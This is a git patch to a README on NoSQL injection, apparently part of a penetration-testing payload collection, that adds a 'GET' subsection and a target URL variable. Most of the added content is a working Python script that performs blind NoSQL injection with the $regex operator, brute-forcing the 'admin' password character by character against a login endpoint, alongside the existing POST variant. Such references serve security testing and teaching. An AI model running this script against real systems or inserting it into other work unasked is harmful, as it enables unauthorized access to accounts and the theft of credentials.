From e467d6096a100498f4bcb89b5118e90343669232 Mon Sep 17 00:00:00 2001
From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com>
Date: Sun, 21 Apr 2019 13:00:16 +0200
Subject: [PATCH] add nosqli GET example

---
 NoSQL Injection/README.md | 27 +++++++++++++++++++++++++++
 1 file changed, 27 insertions(+)

diff --git a/NoSQL Injection/README.md b/NoSQL Injection/README.md
index 21f8a0f..1548bd4 100644
--- a/NoSQL Injection/README.md
+++ b/NoSQL Injection/README.md
@@ -50,6 +50,9 @@ Extract data with "in"
 
 ## Blind NoSQL
 
+### POST with JSON body
+
+
 ```python
 import requests
 import urllib3
@@ -59,6 +62,7 @@ urllib3.disable_warnings()
 
 username="admin"
 password=""
+u="http://example.org/login"
 
 while True:
     for c in string.printable:
@@ -70,6 +74,29 @@ while True:
             password += c
 ```
 
+### GET
+
+```python
+import requests
+import urllib3
+import string
+import urllib
+urllib3.disable_warnings()
+
+username='admin'
+password=''
+u='http://example.org/login'
+
+while True:
+    for c in string.printable:
+        if c not in ['*','+','.','?','|', '#', '&', '$']:
+            payload='?username=%s&password[$regex]=^%s' % (username, password + c)
+            r = requests.get(u + payload)
+            if 'Yeah' in r.text:
+                print("Found one more char : %s" % (password+c))
+                password += c
+```
+
 ## MongoDB Payloads
 
 ```bash